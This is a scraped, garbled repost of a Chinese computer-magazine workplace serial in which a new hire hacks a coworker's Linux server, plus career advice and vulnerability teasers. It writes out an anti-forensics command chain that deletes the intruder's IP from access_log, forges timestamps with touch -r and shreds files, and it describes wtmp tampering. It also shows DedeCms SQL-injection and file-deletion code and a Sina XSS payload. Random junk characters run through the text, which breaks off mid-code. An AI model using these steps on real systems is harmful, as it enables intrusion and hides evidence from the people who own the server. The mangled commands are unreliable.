& && && && &button. Word = encryptDecryptStr(Word, key);1 E# u" B9 g) N, Q
& && &&&}' b1 D5 a% W7 Y2 N) O3 E
运行代码后,毒辣辣看到了文档中的内容,可是看到内容后,他反而糊涂了:“胖哥记录都是什么乱七八糟的东东?”
胖哥这么看重的文档,怎么可能都是不良信息?看着不良信息,毒辣辣陷入了沉思,突然,他眼睛一亮,眼前的信息不在不良……# _2 j6 B8 {4 K/ ~9 S8 M: b" P0 _: m
毒辣辣到底想到了什么?文档有暗藏什么玄机?请看下集分解。
& n) y1 y8 ]* d4 W8 I$ C- v
职场点评& \1 @7 D2 N: j
在上文中,胖哥故意将吃力不讨好的活交给新人毒辣辣,小小的阴了毒辣辣一把。在职场,新人吃点小亏是很常见的事情,千万不要乱发脾气,一定要“大事化小,小事化了”, 不惹事端,多考虑领导的安排、同事的感受,多想想如何将工作做好,这有助于以后工作的发展。
很多人初涉职场的大学生,容易抱怨“吃的是杂粮,干的是杂活,做的是杂人”,而很少想到如何化被动为主动,转“亏”为“福”,如何干好手中的工作,让杂活也出彩,给自己加分。好的表现,领导是不会忽略的。% c2 f, C' N/ M3 }
毒辣辣接到任务安排,也知道自己是吃亏了,可他没有抱怨,努力做好这份工作,虽然当前还没有成效,但他的认真的态度会逐步得到领导和同事的认可。所以,有时候在职场,吃亏也是一种福。: p2 R0 {& A& _' V% L2 k&&_: d&&x
/ d& G8 H: |' y5 {0 o) F; _
交流互动$ X- J/ S& H1 N&&i3 W4 u2 H
& & & & 每期故事中的技术,我们都会在电脑报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!3 p8 }% F" N&&N3 F! X! j
上期技术问题的答案是有间接的方法可以PJ。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。
技术题目:异或加密的原理是什么?1 \/ x- {&&s6 S- T) Q
剧情题目:Word中藏有什么秘密( 附上分析)?/ ^( I* r6 ?& n% p1 L
想知道答案,请看毒辣辣求职记(8)。如果你想到答案了,请到留言或者发邮件到,答对者将有机会获得我们送出的2GB防病毒闪存。) T0 @6 \1 w) {
&&t& W7 i$ V1 M! j6 {$ V
黑白配" I, y) k) o7 Z
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。
/ h. y$ V4 R* |) {% _&&Q
黑暗竞技场
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!) _9 x! k9 y3 }9 A&&`
0 X# `& h/ O&&j8 ^
最近,DedeCms V5.6建站系统爆出注入漏洞,该漏洞会导致网站被黑客攻击。漏洞出现的原因是plus/advancedsearch.php $sql 变量未初始化。导致漏洞出现的关键代码如下:
if($mid == 0)//必须绕过限制 ; a6 P5 M/ ~; @6 N5 @&&H$ w0 r
{ * @: Z/ G4 R- w5 X7 _0 A
showmsg(''参数不正确,高级自定义搜索必须指定模型ID'', ''javascript'');
$query = &select maintable, mainfields, addontable, addonfields, template from& & dede_advancedsearch where mid=''$mid''&;
5 X( \5 J0 O4 {& i" `! Y
该漏洞到底如何利用?漏洞利用的具体方法是什么?大家可以将自己的研究心得发送到电脑报官方论坛数动连线()安全板块,也可以直接写信与小编交流,来信请发到。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。$ _9 t# z0 [& l5 _&&a1 g1 y
& & & & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
毒辣辣求职记(8)
毒辣辣初入职场,就得到主任的赏识,受到老同事胖哥的嫉妒,他一次又一次地设计陷害毒辣辣。毒辣辣发动了反击,入侵了胖哥的电脑,在里面发现了重要的信息。毒辣辣正逐渐接近真相,胖哥的秘密将一览无遗。
连载地址:) T* C' B4 I8 r5 ~
/ K% k: D/ [! i1 h) {6 P4 n* A* C
惊天秘密 浮出水面
故事主角:毒辣辣
其他人物:胖哥(老资格的同事)、主任(直接领导)、紫衣MM(会计)( U( M2 c- h! O- H
本期知识点:Linux服务器入侵痕迹清除
+ W" Y6 k1 i/ j/ z
故事提要:毒辣辣从胖哥电脑的神秘文档中,发现了新的线索,根据线索找到了胖哥在备用Linux服务器中隐藏的EXCEL文档,里面的记录信息让毒辣辣震惊不已。EXCEL文档到底记载了什么不可告人的迷秘密?
点醒梦中人
眼前的不良信息,不再不良,毒辣辣从中提取出很多重要信息。每隔一个月胖哥就会在文档中添加一条信息,每条信息中都有一组奇怪的文字,例如小楼一夜听春雨、天外流星、青青、铁燕夫人等。$ j+ G! F/ O, O' a
做到这一步,毒辣辣还是感到迷茫,直觉告诉他,这些奇怪的文字都是有所关联的,与他追寻的真相也密切相关。文字中到底暗藏了什么信息?胖哥记录这些信息绝不会好玩,肯定有阴谋!
“小楼一夜听春雨是一首诗、天外流星是一个现象,青青、铁燕夫人肯定是在说人……乱七八糟的东东,我都要疯了!”一筹莫展的毒辣辣快要崩溃了。9 u( c&&i3 x" S0 C5 N
此时,胖哥走到毒辣辣身边,皱着眉头批评毒辣辣:“财务室不是你负责吗?你怎么没有去维护数据库?”&&X7 w8 L0 d- v! P; z2 m
“维护数据库?数据库出故障了?没有人通知我!”&&e! t# a8 e* ?" g6 u$ j5 p/ _
“你不是有信息中心办公平台的账号吗?你不会自己去看?你现在有具体任务了,每天都要登录平台看看有没有你的任务。”, B' w" f6 D5 z. ~
“我马上去看看。”) y4 f: X& E9 C' z* `
“这次任务你没有及时出工,我会记录下来,下不为例。”&&]3 I/ k, y: v5 U
“……”&&r: Z% Q5 F! ]4 |2 \/ J
毒辣辣无比郁闷,才正式接手工作,就被记过一次,看到胖哥的背影,毒辣辣恨得牙痒痒:“等我揭开你真面目了,看你还敢阴我!哼哼!”
毒辣辣来到财务室维护数据库服务器,与紫衣MM再次相遇,经过几分钟的努力,毒辣辣排除了故障,紫衣MM等人的电脑终于成功连接上了数据服务器。紫衣MM俏皮地表扬道:“还不赖,这么快就搞好了。故障都排除了,你怎么还是愁眉苦脸的?”
“小楼一夜听春雨、天外流星、青青、铁燕夫人,你说这几组文字代表了什么?我头疼了一个上午,就为找出它们的交集发愁!”毒辣辣把事情的经过告诉了紫衣MM,对她也没有什么好隐藏的,正好死马当活马医说不定紫衣MM可以想到答案。: F2 Q0 ]9 T& E' }# h+ q
“小楼一夜听春雨,这不是古龙《圆月弯刀》中的那首诗吗?”
“这是宋代诗人陆游的《临安春雨初霁》的诗句,关古龙什么事情?”4 W, i, G& U1 @' ^# x/ O* h
“当然有关,青青、铁燕夫人是《圆月弯刀》你们的人物,古天乐演的电视剧,你没有看,我跟你说……”7 |" I&&T. l$ i- ^: j9 a7 J
一句惊醒梦中人,神秘的文档在毒辣辣眼中不再神秘。
胖哥的秘密" d$ m. r0 g' u: z4 o0 I
为了证实自己的猜想,毒辣辣回到自己的办公室然后在网上搜索《圆月弯刀》,核对后发现每条信息都与《圆月弯刀》有关,终于找到交集点了。8 K. B% a3 e5 j
“圆月弯刀、圆月弯刀,圆月?”毒辣辣若有所思地调出信息中心分配表,你们记录了所有电脑、服务器的名称和IP地址。没有多久,毒辣辣就找到了目标,名称为圆月的应急服务器,就是它了!
剩下的就不难猜了,每组文字的拼音就是密码,例如小楼一夜听春雨的拼音是xlyytfy,密码应该是xlyytfy。毒辣辣输入圆月服务器的IP地址,输入最新的密码后成功登录,他没有猜错!) Z3 |/ }&&|$ R' d
“服务器中一定藏有胖哥的秘密!他每个月改变一次登录密码,真的是煞费苦心!”毒辣辣开足马力,在服务器中疯狂寻找一切可疑的东东,不懈努力他发现了一个加密的Excel文档。
又要PJ!好在毒辣辣已经掌握了胖哥的加密规律,数分钟就PJ了Excel看到了里面的内容。看到Excel中的内容,毒辣辣惊得目瞪口呆:文档中记录了大量IP地址中的隐藏账号信息。
其中一个IP地址,毒辣辣非常熟悉是紫衣MM的电脑。“怪不得我给紫衣MM安装PSP终结者胖哥会知道,原来他早就可以控制紫衣MM的电脑了,真是十足卑鄙的小人!”毒辣辣异常愤怒。
毒辣辣收藏了Excel,接着准备清除入侵服务器(Linux)的痕迹。毒辣辣通过touch /dev/shm/ touch -r access_log /dev/shm/sed'/192.168.4.3/d' access_log & /dev/shm/ cat/dev/shm/backlog & access_ touch -r /dev/shm/timestamp./access_shred -n 255 -z -u /dev/shm/命令删除服务器中的日志,192.168.4.3是毒辣辣电脑的IP地址。. n5 x( V& n- _# t3 [. A
毒辣辣接着将wtmp文件中的登录信息进行了窜改,伪装成上次管理员登录的IP地址和时间,这样如果胖哥不细看的话,很难发现该服务器被人闯入过。需要注意的是,除了手动删除日志,可以借助一些日志小工具清除日志。
" ]! I" `4 Z8 n/ r&&j
清除入侵痕迹后,毒辣辣第一时间奔向紫衣MM,索要不菲的“咨询费、保密费、营养费、劳务费”之后,帮紫衣MM清除了隐藏账号。毒辣辣的表现,令紫衣MM刮目相看,一股难以言语的好感涌上心头。2 N9 T* p&&T2 e: o& ?% g
在紫衣MM的帮助下,毒辣辣惊奇地发现,那些被添加了隐藏帐号的电脑,都是公司里面的高层和核心要害部门成员使用的。胖哥到底是什么人?他这么做的意图又是干什么?
0 E" G- b. P6 k! i# N
职场经验点评
本期毒辣辣与紫衣MM已经擦出好感的火花,要不了多久两人就会涉及职场恋爱。关于职场爱情的问题,历来争议颇多——是否会影响工作效率,如果职场恋爱不注意以下几条很容易带来坏的影响。
第一条:以工作为本。单位内部的恋爱,不管是否影响工作,总会给领导一种潜在的思维暗示——你工作不够专心。因此,职场新手必须把干好工作作为第一要务、立身之本,把恋爱放在次要位置,起码在工作时间是这样。要把工作做得比恋爱前做得更好更出色,避免受人以柄。: |( k% S& u' ?" e2 Y! Q
第二条:以同事为先。恋人关系的存在,往往打破了单位内部同事之间均等的、独立的、对称的朋友关系。这就要求同一单位的恋人,在处理工作事务和同事关系的时候,更要讲大局、讲风格、高姿态,做到先有同事、后有夫妻,更加注重坦诚、热情的和同事打成一片,注重及时与领导、同事坦率的交流思想、交换认识,减少同事对自己或配偶的无谓顾虑和猜忌。2 p&&u, p+ b2 O- A+ m- r
第三条:以制度为重。“瓜田不纳履,篱下不整冠”,避嫌是非常中重要的,要遵守公司的各项制度和规定,不能借岗位和工作便利,为自己的恋人提供方便、违例违规,特别要尽量避免在直接上下级、涉及重大利益分配、存在制衡或监督关系的岗位上担任职务。情况特殊,必须担任的,要与上级领导做好汇报和沟通,避免招人闲话。
交流互动. B5 G, Y2 e0 [5 M* ]
& & & & 每期故事中的技术,我们都会在电脑报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!
上期技术问题的答案是和同一个数字异或两次还是自身。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。! w- ]% @9 A- Q; j
技术题目:单机入侵需要清除哪些痕迹?
剧情题目:胖哥为什么要入侵那么多电脑(附上分析)?* A7 X, M&&F" \7 S5 e
想知道答案,请看毒辣辣求职记(9)。如果你想到答案了,请到留言或者发邮件到,答对者将有机会获得我们送出的2GB防病毒闪存。2 k' F3 @* ]7 \&&_7 s+ ^, w0 L3 M) @
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。2 b+ h- M( p( X7 t
远程操控, l, `$ B( ^5 O# _
7 d! d) [: ~7 {) [- P8 y0 g
黑暗竞技场' q. z# Y; t1 C% N
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!
. ]0 k3 x9 |$ C7 j&&r( Y
最近,新浪网爆出跨站漏洞,可以被黑客利用来发动挂马攻击。跨站漏洞出在(%22sitedir%22);%3C/script%3E%3C%22&ts=bpost&stype=all,出现的原因是过滤不严(见图),双引号的限制可以被绕过(输入&&&script&alert(&sitedir&);&/script&&&)。9 z, P7 `* l: N
& j* [4 C+ B/ r* q, o
该漏洞到底如何利用?漏洞利用的具体方法是什么?大家可以将自己的研究心得发送到电脑报官方论坛数动连线()安全板块,也可以直接写信与小编交流,来信请发到。每周我们都会挑出幸运者,赠送每人一份奖品。此外,还有机会在报纸上得到推荐。
& & & & 本期奖品是安天木马防线KEY和USB连接器,奖品由安天提供,价值30元或300X币。
提高发帖质量,建设交流社区
TA的每日心情开心 08:29签到天数: 355 天[LV.8]以坛为家I
黑客营) N1 {7 H& b( {$ i
毒辣辣求职记(9)
毒辣辣初入职场,就得到主任的赏识,受到老同事胖哥的嫉妒,他一次又一次地设计陷害毒辣辣。毒辣辣发动反击,发现了胖哥的秘密,掌握了胖哥的把柄,而此时胖哥也察觉到电脑有异常。胖哥会发现毒辣辣高的小动作吗?
连载地址:
心惊肉跳的胖哥
故事主角:毒辣辣: Y& F' ?9 Q* M; a. Q&&p% T
其他人物:胖哥(老资格的同事)、主任(直接领导)、紫衣MM(会计)
本期知识点:黑客如何自检电脑安全
; [1 z" W( Y: a( P& f- ?: k
故事提要:在如何处置胖哥秘密这件棘手事情上,毒辣辣和紫衣MM的意见各不相同。而经历了诸多磨难和挫折的毒辣辣,已经日渐成熟起来,掌握了关键证据的他并没有成功的喜悦,在经过一段思想斗争之后,选择了令人惊讶的解决方法……! S5 S$ A* \5 P) C' X0 K
震惊之后,毒辣辣和紫衣MM开始商量如何处理这件严重而棘手的问题。胖哥对毒辣辣的刁难和陷害,紫衣MM可是看在眼里中,心中为毒辣辣愤愤不平,不过胖哥是毒辣辣的直接领导,她也没有什么其他想法。3 o' K& D( g7 ]8 c) Q, M
可是现在,胖哥竟然入侵了公司重要人物的电脑,私自监控、记录他们的信息,无疑是自找死路,绝对不能放过他。
“毒辣辣,你将Excel文件交上去,我再帮你宣传宣传,让大家看清胖哥的真面目,保证让他吃不了兜着走!”7 j% y! `6 ^! M0 v- S( ~: s
“这样不就搞得满城风雨了吗?不太好吧,我想想!”
“还想什么?你忘了他怎么刁难你的么?你忘了他怎么陷害你了么?你还是不是个男人,就不能犹豫和胆怯,赶紧把这件事情公布出来,让领导知道,影响越大越好,让胖哥成为众矢之的。记住,一定要痛打落水狗,哼!他竟然敢监控我的电脑,这次绝对不能饶了他!”
紫衣MM显得十分兴奋,一方面是见识了精彩刺激的黑客技术,另一方面是终于有了报复胖哥的机会,嘴里象打起了机关枪,冲着毒辣辣一通扫射:“噫?毒辣辣,你杂了,怎么和霜打的菠菜一样,你看你这出息样!”9 C/ K8 p3 I8 B1 u6 p
与紫衣MM的兴奋相反,毒辣辣这时候显得比较沉闷。在来公司实习的这一段时间里,毒辣辣感到经历了很多的挫折和磨难,而这些挫折和磨难的谜底已经解开的时候,毒辣辣却有了一份曾经沧海难为水的稳重和冷静。
“这件事情背后恐怕不简单,容我再想想,你一定要保密呦!”毒辣辣慢吞吞地说道,正端着杯子喝水的紫衣MM忍不住“噗”的一声,喷了毒辣辣一头雾水。在毒辣辣抹着眼镜上的雾水的时候,生气的紫衣MM掉头跑了:“我不管你啦!”
# ?3 y% }; X" k
不管如何掩饰,毒辣辣心事重重的样子,还是引起了胖哥的注意。胖哥有一种不好的预感,他似乎预感自己招了毒辣辣的道。出于黑客特有的敏感,胖哥决定检测一下电脑,让自己浮躁的心稳定下来。, o( k+ B1 H$ e8 F
胖哥点击“开始→运行”,输入“CMD”进入命令提示符窗口,输入netstat命令(见图),netstat命令的功能是显示网络连接、网络接口等信息,可以让胖哥知道目前有哪些网络连接正在运作。
胖哥仔细检查了所有的网络连接,有的连接外网,有的连接FTP服务器,可一个陌生的连接让他心一跳,是一个熟悉的内网地址——这个地址还是他分配给毒辣辣的。冷汗从胖哥的额头不断涌出。一般来说,如果中了蠕虫病毒或者中了远程控制木马,就会启动网络连接,高手通过IP地址很容易就分辨出来。
胖哥调出嗅探工具Dsniff,它是一款嗅探工具,可以用来寻找入侵的痕迹。利用嗅探工具,胖哥确定自己中了远程控制木马,心就一沉——这是胖哥最不愿意看到的结局。胖哥立即调出进程管理工具Wsyscheck,寻找免杀过的远程控制木马。% J3 k$ J5 f( K( Y$ D3 l' [+ ?. m
清除木马后,胖哥依然忐忑不安,不知道毒辣辣发现了什么。突然,他想到了一件事情,立即登录“圆月”服务器,定位到隐藏的Excel文件。文件还在,胖哥送了一口气,气还没有出完,有想到另外一个可能,立即使用隐藏账号登录紫衣MM的电脑,发现隐藏账号已经不存在了,胖哥的心凉了!
学会圆滑&&m" z: e9 d& }$ C$ T
就在胖哥自检电脑的时,毒辣辣离开了座位,进入了主任的办公室。他口述了自己的发现,将Excel文档交给主任。看完文档后的主任惊得目瞪口呆,几秒后平静了下来,不动声色的敲着桌子——每当他思考的时候就会做出这个习惯性动作。
“这个文档还有谁知道?”主任终于开口了。: u+ M8 @7 H. K! R5 u0 v- n6 s
“除了我,没有其他人知道。”毒辣辣隐瞒了知晓内情的紫衣MM。
“你认为现在应该怎么做?”主任继续问道。
“我会忘记这件事,主任你说怎么办就怎么办!”7 _' }; A$ U5 Z$ p1 \2 o5 v& q2 w7 N
“毒辣辣,你越来越成熟了,我看好你,希望实习期满后,你能顺利的留下了。”
“我一定会根据努力工作的。”
# P* m" q. O0 \& o3 {5 Y
主任会怎么处理这件事呢?胖哥的结局会如何呢?毒辣辣是否可以正式入职?闹情绪的紫衣MM还会跟毒辣辣和好吗?毒辣辣求职记大结局,不容错过!
" k+ h9 a2 c) R
职场点评5 e! F$ y" f/ s. n8 N) T
本期,毒辣辣在处理棘手问题上显得非常冷静,尤其是面对快言快语的紫衣MM,愤怒异常的主任,都能保持冷静,没有被别人的情绪和观点影响,很值得称道。同时,毒辣辣在深入全面的思考之后,以大局为重、以团结为重、以未来为重,决定采取低调处理的方式。表现出了很高的觉悟、良好的修养、优秀的素质。
作为从大学步入社会的职场新手来说,面对更加复杂的人际关系,更加功利的人性欲望,甚至是不择手段的阴谋诡计,往往陷入许多困惑和矛盾之中,对价值观念、人生追求、品行修养产生新的认识和看法。# l& \8 `&&M( P& P) w
对年轻人讲,人格的完善、心态的成熟、精神的健康、道德的提升更为重要。没有一个好的心态、好的修养、好的价值追求,只能在现实生活中不断陷入困扰和矛盾之中。因此,这里也给诸位初入职场的朋友提个醒,大家要保持好的心态,从纷纷扰扰的世俗羁绊中解脱出来,用自己的辛勤劳动开创事业、创造美好生活。7 B* `$ q: {* O6 Z% A
% z, h8 h1 L7 H8 I
交流互动' b' @' i+ s( j2 V3 U. T
& & & & 每期故事中的技术,我们都会在电脑报官方论坛数动连线()安全板块中,邀请黑客营的高手进行深入的挖掘,他们是在什么情况下使用这些黑客技术的,使用过程中可能会出现什么问题,应该如何解决,精彩不容错过!) ?: y3 {+ m- F% r6 S
上期技术问题的答案是需要清除应用程序日志,安全日志,系统日志。有上万人通过论坛、邮件、QQ群和手机四条途径参与了竞猜,产生了一批幸运获奖者,获奖名单请登录查询。+ l0 c1 ], {2 T7 c
兄弟们,你们关心过CMD中的网络连接吗?那些连接都是正常的吗?截图来晒晒,大家一起交流学习一下。发送截图,就有机会获得我们送出的2GB防病毒闪存。邮件请发送到或者发送到,我们等着你!
% m3 y* [9 s6 V: n
黑白配1 J1 \: R6 Y8 ]4 A3 {0 m% @
& & & & 黑白配,男生女生配,在他们的电脑安全生活中,在攻与防中,爆笑无处不在。欢迎投稿或者提供创意,有丰厚的奖励等着你,来稿请寄。0 B. ^8 S( `' y2 T4 b
不能正常关机2 h, L* f1 M' Y' h4 j" E- f1 Q, X
9 [, Y. e: V6 _; V$ l&&Z; Q
! ]' r( ~) D/ W
黑暗竞技场
& & & & 传说,在云之彼端有一座黑暗竞技场,在竞技场里面可以随意施展黑客技术。每逢虎年,竞技场将打开大门,迎接新的勇士。来吧,来竞技场吧,来一展你的身手吧!在这里,你可以施展黑客技术;在这里,你可以与高手交流。Let’s go!. S, M' C7 C&&c; E$ p* m9 s7 J- j
最近,织梦建站系统V5.6版爆出远程文件删除漏洞,该漏洞会导致黑客远程删除.jpg 、.gif 、.png 类型的文件。漏洞出在edit_face.php中,原因是过滤不严,导致漏洞出现的关键代码如下所示:
else if($dopost==''delold'')&&//45行
& && &&&if(empty($oldface)); _; e/ M# e' k6 m
& && &&&{$ y' B5 q* S) a" n1 V; h
& && && && && & ShowMsg(&没有可删除的头像!&, &-1&);3 c! \+ W* u9 K. K7 {2 P
& && && && && & exit();
& && &&&$userdir = $cfg_user_di

我要回帖

更多关于 上海居住证积分好处 的文章

 

随机推荐